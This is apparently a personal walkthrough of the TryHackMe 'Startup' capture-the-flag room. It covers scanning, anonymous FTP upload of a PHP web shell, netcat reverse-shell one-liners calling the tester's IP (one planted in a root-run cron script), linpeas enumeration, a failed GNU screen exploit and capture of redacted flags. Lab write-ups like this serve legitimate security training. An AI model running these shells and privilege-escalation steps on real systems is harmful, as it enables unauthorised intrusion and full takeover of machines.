TryHackMe: Startup / Spicehut

Spice Hut

TryHackMe: Spice Hut https://tryhackme.com/room/startup

Enumeration

Ok, first thing first lets scan it

$ rustscan  10.10.112.240 --ulimit 10000 -- -sC -sV -A -oA spicehut -v -Pn
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
Faster Nmap scanning with Rust.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/tj/.config/rustscan/config.toml"
[~] Automatically increasing ulimit value to 10000.
Open 10.10.112.240:80
Open 10.10.112.240:22
Open 10.10.112.240:21
[~] Starting Nmap
[>] The Nmap command to be run is nmap -sC -sV -A -oA spicehut -v -Pn -A -vvv -p 80,22,21 10.10.112.240

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-08 19:26 GMT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:26
Completed NSE at 19:26, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:26
Completed NSE at 19:26, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:26
Completed NSE at 19:26, 0.00s elapsed
Initiating Connect Scan at 19:26
Scanning spicehut (10.10.112.240) [3 ports]
Discovered open port 22/tcp on 10.10.112.240
Discovered open port 21/tcp on 10.10.112.240
Discovered open port 80/tcp on 10.10.112.240
Completed Connect Scan at 19:26, 0.04s elapsed (3 total ports)
Initiating Service scan at 19:27
Scanning 3 services on spicehut (10.10.112.240)
Completed Service scan at 19:27, 6.09s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.112.240.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:27
NSE: [ftp-bounce 10.10.112.240:21] PORT response: 500 Illegal PORT command.
Completed NSE at 19:27, 1.63s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:27
Completed NSE at 19:27, 0.24s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:27
Completed NSE at 19:27, 0.00s elapsed
Nmap scan report for spicehut (10.10.112.240)
Host is up, received user-set (0.035s latency).
Scanned at 2020-11-08 19:26:59 GMT for 8s

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxrwx    2 65534    65534        4096 Oct 02 18:43 ftp [NSE: writeable]
| -rw-r--r--    1 1000     1000        49685 Sep 22 12:37 important.jpg
|_-rw-r--r--    1 0        0             208 Oct 02 18:43 notice.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.9.5.198
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e8:7c:ee:58:b5:d3:44:7c:fd:86:95:20:16:d0:f9:8a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDPh5uMkrSje9CSQv4uoys0+h5X2T0z1EDce3bXIXdxG3e/zxyjoa58acUARG7CZpyGm33C0e2bcjPE+UqhuYd0bvU48+Y+zZ3IR99zsVSiVrKWOFL2zzooSb7LpdNZE5uoW9R+p1FeL1EnsyNZuD9t21AHXml4EbJtOkIvxOLPbVHtlS83iHaNcOIQcHdWsWMgnQaP0HZ4007asS5eqpDQ9xDUOJ63EmvoxvhH2nW7c/fyhBJrgacwWnSLTJrJr3i2Jyg3+hIJ+yqKRdTPm3N8VL71fq9+QQ8dZ6ilCdAeNXP34sLBwOGCq0Gz/7fLxJNHyP5nG944lsXwGwENTUpP
|   256 d3:d1:f5:65:e4:5d:98:6a:08:5b:10:6d:6f:e2:29:2f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOd8CzNVOD41btFpxAPJUCCyb5O5KEcMnD2+gQX8t/UOa6V8zdR/vPY2iPa+T3S5UzO051P2ERJV4U3Hdy4Ni0k=
|   256 23:11:b7:d5:2b:77:51:54:12:d7:1c:9d:46:5a:4f:17 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIO80cG5JnHfWY05QTiDxW6oxIB3hI9CdKOW0UMTRuEH5
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Maintenance
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:27
Completed NSE at 19:27, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:27
Completed NSE at 19:27, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:27
Completed NSE at 19:27, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.71 seconds

SSH

Will need creds here so lets skip

FTP

Ok, so anonymous FTP is enabled

$ ftp spicehut
Connected to spicehut.
220 (vsFTPd 3.0.3)
Name (spicehut:tj): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 65534    65534        4096 Oct 02 18:43 .
drwxr-xr-x    3 65534    65534        4096 Oct 02 18:43 ..
-rw-r--r--    1 0        0               5 Oct 02 18:43 .test.log
drwxrwxrwx    2 65534    65534        4096 Oct 02 18:43 ftp
-rw-r--r--    1 1000     1000        49685 Sep 22 12:37 important.jpg
-rw-r--r--    1 0        0             208 Oct 02 18:43 notice.txt
226 Directory send OK.

Ok we are can see some files, and one hidden file, lets download them

ftp> get .test.log
ftp> get ftp
ftp> get important.jpg
ftp> get notice.txt

HTTP

Quick look at HTTP shows the below site

Nothing much in the source

<!doctype html>
<title>Maintenance</title>
<style>
  body { text-align: center; padding: 150px; }
  h1 { font-size: 50px; }
  body { font: 20px Helvetica, sans-serif; color: #333; }
  article { display: block; text-align: left; width: 650px; margin: 0 auto; }
  a { color: #dc8100; text-decoration: none; }
  a:hover { color: #333; text-decoration: none; }
</style>

<article>
    <h1>No spice here!</h1>
    <div>
	<!--when are we gonna update this??-->
        <p>Please excuse us as we develop our site. We want to make it the most stylish and convienient way to buy peppers. Plus, we need a web developer. BTW if you're a web developer, <a href="mailto:#">contact us.</a> Otherwise, don't you worry. We'll be online shortly!</p>
        <p>&mdash; Dev Team</p>
    </div>
</article>

Whilst we look at the FTP files lets kick off gobuster in the back ground

$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://spicehut
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://spicehut
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/11/08 19:33:37 Starting gobuster
==============================================================

FTP Files

Lets look at these FTP files

$ cat notice.txt 
Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus.
$ cat .test.log 
test

OK, lets take a look at the image file

Looking at strings it looks like random stuff at the start of important.jpg but as we do not have a password steghide says no :(

$ strings important.jpg 
JFIF
)$+*($''-2@7-0=0''8L9=CEHIH+6OUNFT@GHE
!E.'.EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
#35BR
6Tct
DEFU

HTTP

Going back to gobuster we have the following

===============================================================
2020/11/08 19:33:37 Starting gobuster
===============================================================
/files (Status: 301)

So lets take a look at /files

Hmmm, that appears to be the ftp directory..... lets jump back in and see if we have write access as anonymous

$ ftp spicehut
Connected to spicehut.
220 (vsFTPd 3.0.3)
Name (spicehut:tj): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put web.php
local: web.php remote: web.php
200 PORT command successful. Consider using PASV.
553 Could not create file.

OK, we do not have write access here, but what about the FTP directory ?

ftp> cd ftp
250 Directory successfully changed.
ftp> put web.php
local: web.php remote: web.php
227 Entering Passive Mode (10,10,112,240,181,66).
150 Ok to send data.
226 Transfer complete.
1772 bytes sent in 0.00 secs (27.2566 MB/s)
ftp> dir
227 Entering Passive Mode (10,10,112,240,88,228).
150 Here comes the directory listing.
-rwxrwxr-x    1 112      118          1772 Nov 08 19:42 web.php
226 Directory send OK.
ftp> 

Sweet, web.php is a just PHP web shell I use by Artyuum . SO lets browse to it

Cool, we have a webshell so lets get a reverse shell to make it easier!

Webshell2Reverseshell

OK, let set a reverse shell using the above and bash using a refrence from my favourite source http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.5.198 8888 >/tmp/f

And on our box

$ nc -lvnp 8888
listening on [any] 8888 ...
connect to [10.9.5.198] from (UNKNOWN) [10.10.112.240] 44710
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@startup:/var/www/html/files/ftp$ export TERM=xterm
export TERM=xterm
www-data@startup:/var/www/html/files/ftp$ ^Z
[1]+  Stopped                 nc -lvnp 8888
$ stty raw -echo; fg
nc -lvnp 8888

www-data@startup:/var/www/html/files/ftp$ 
www-data@startup:/var/www/html/files/ftp$ 

Looking in /home we see lennie but access denied...

www-data@startup:/tmp$ cd /home/lennie
bash: cd: /home/lennie: Permission denied

So lets change to /tmp and get linpeas.sh on the host

$ cd /tmp                                                                                      
www-data@startup:/tmp$ scp tj@10.9.5.198:pentest/ctfs/linpeas.sh     
www-data@startup:/tmp$ sh linpeas.sh

Linpeas

Ok, looking through the linpeas.sh output we have the following interesting parts.

====================================( Interesting Files )=====================================
[+] SUID - Check easy privesc, exploits and write perms                                                                      
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands                         
/bin/mount              --->    Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8                                
/bin/fusermount
/bin/umount             --->    BSD/Linux(08-1996)
/bin/ping6
/bin/su
/bin/ping
/usr/bin/passwd         --->    Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
/usr/bin/pkexec         --->    Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
/usr/bin/at             --->    RTru64_UNIX_4.0g(CVE-2002-1614)
/usr/bin/sudo           --->    /sudo$
/usr/bin/newuidmap
/usr/bin/chfn           --->    SuSE_9.3/10
/usr/bin/newgrp         --->    HP-UX_10.20
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
[+] SGID
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands                         
/sbin/unix_chkpwd                                                                                                            
/sbin/pam_extrausers_chkpwd
/usr/bin/screen         --->    GNU_Screen_4.5.0
/usr/bin/chage
/usr/bin/at             --->    RTru64_UNIX_4.0g(CVE-2002-1614)
/usr/bin/mlocate
/usr/bin/wall
/usr/bin/ssh-agent
/usr/bin/bsd-write
/usr/bin/expiry
/usr/bin/crontab
/usr/lib/x86_64-linux-gnu/utempter/utempter
[+] Unexpected folders in root
/incidents
/data

Lets take a look the files in the folders under /

www-data@startup:/incidents$ ls /data /incidents/ -a
/data:
.  ..

/incidents/:
.  ..  suspicious.pcapng

Hmm, we have pcapng file that we can copy off and look at in wireshark. I will use /files/ftp on the webserver

cp /incidents/suspicious.pcapng /var/www/html/files/ftp/

Wireshark

OK, looking at http traffic it looks like someone else has copied a webshell here in the past. Lets take a look at traffic on port 4444, lets dump it all out to plain text

Recipe

Looking through the wireshark dump we see /recipi.txt

lennie@startup:~$ cat /recipe.txt 
Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was [REDACTED].

User Flag

Looking through the plain text file we can find lennie password. So lets use su - and switch accounts. Unfortunately we can not run sudo but does give us access to the home directory

www-data@startup:/incidents$ su - lennie
Password: 
$ id
uid=1002(lennie) gid=1002(lennie) groups=1002(lennie)
$ bash
lennie@startup:~$ sudo -l
[sudo] password for lennie: 
Sorry, user lennie may not run sudo on startup.

But atleast we can access the user flag

lennie@startup:~$ pwd && ls
/home/lennie
Documents  scripts  user.txt
lennie@startup:~$ cat user.txt 
THM{[REDACTED]}

PrivEsc

Now that we have changed user, lets run linpeas.sh again and see if anything else pops up interesting

lennie@startup:~$ sh /tmp/linpeas.sh 

Interesting Bits

[+] Finding *password* or *credential* files in home (limit 70)
/home/lennie/Documents/password.txt                                                                                          

[+] Finding 'pwd' or 'passw' variables inside /home /var/www /var/backups /tmp /etc /root /mnt (limit 70)
/home/lennie/Documents/password.txt:I tried to change my password to "penis" the other day, it said it wasnt long enough. =( 
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files                                             
/etc/print.sh
[+] Looking for root files in home dirs (limit 20)
/home                                                                                                                        
/home/lennie/scripts
/home/lennie/scripts/startup_list.txt
/home/lennie/scripts/planner.sh
/home/lennie/Documents/note.txt
/home/lennie/Documents/password.txt
/home/lennie/Documents/list.txt
====================================( Interesting Files )=====================================
[+] SUID - Check easy privesc, exploits and write perms                                                                      
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands                         
/bin/mount              --->    Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8                                
/bin/fusermount
/bin/umount             --->    BSD/Linux(08-1996)
/bin/ping6
/bin/su
/bin/ping
/usr/bin/passwd         --->    Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
/usr/bin/pkexec         --->    Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
/usr/bin/at             --->    RTru64_UNIX_4.0g(CVE-2002-1614)
/usr/bin/sudo           --->    /sudo$
/usr/bin/newuidmap
/usr/bin/chfn           --->    SuSE_9.3/10
/usr/bin/newgrp         --->    HP-UX_10.20
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1

[+] SGID
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands                         
/sbin/unix_chkpwd                                                                                                            
/sbin/pam_extrausers_chkpwd
/usr/bin/screen         --->    GNU_Screen_4.5.0
/usr/bin/chage
/usr/bin/at             --->    RTru64_UNIX_4.0g(CVE-2002-1614)
/usr/bin/mlocate
/usr/bin/wall
/usr/bin/ssh-agent
/usr/bin/bsd-write
/usr/bin/expiry
/usr/bin/crontab
/usr/lib/x86_64-linux-gnu/utempter/utempter

Looking through I know there is an exploit for /usr/bin/screen if it is indeed on 4.5.0.... jumping over to ExploitDB lets take a copy of the shell https://www.exploit-db.com/exploits/41154 and run it

$ ./screen_pop.sh 
~ gnu/screenroot ~
[+] First, we create our shell and library...
./screen_pop.sh: line 22: gcc: command not found
./screen_pop.sh: line 34: gcc: command not found
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
No Sockets found in /var/run/screen/S-lennie.

./screen_pop.sh: line 42: /tmp/rootshell: No such file or directory

Ahh no gcc, so lets try something else. /etc/print.sh looks random, can not see anything calling it but to edge our bets lets setup a listener nc -lvnp 6789 and place in our reverse shell to see if we get a call back.

$ cat /etc/print.sh 
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.5.198 8889 >/tmp/f
echo "Done!"

On our box we wait......... and boom we get a shell back

$ nc -lvnp 8889
listening on [any] 8889 ...
connect to [10.9.5.198] from (UNKNOWN) [10.10.112.240] 36848
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
#THM{f[REDACTED]}

Cron

I just took a punt on the /etc/print.sh as it looking out of place, looking from my linpeas.sh output I could not find it but once on as root found root was running a script from lennie home directory.

# crontab  -l
* * * * * /home/lennie/scripts/planner.sh

Looking back through my linpeas.sh output as I hate it when I miss things I can see I should of picked it up as it was under

[+] Looking for root files in home dirs (limit 20)

Oh well, that could have been a stumbling block but spotting /etc/print.sh really was a bit luck.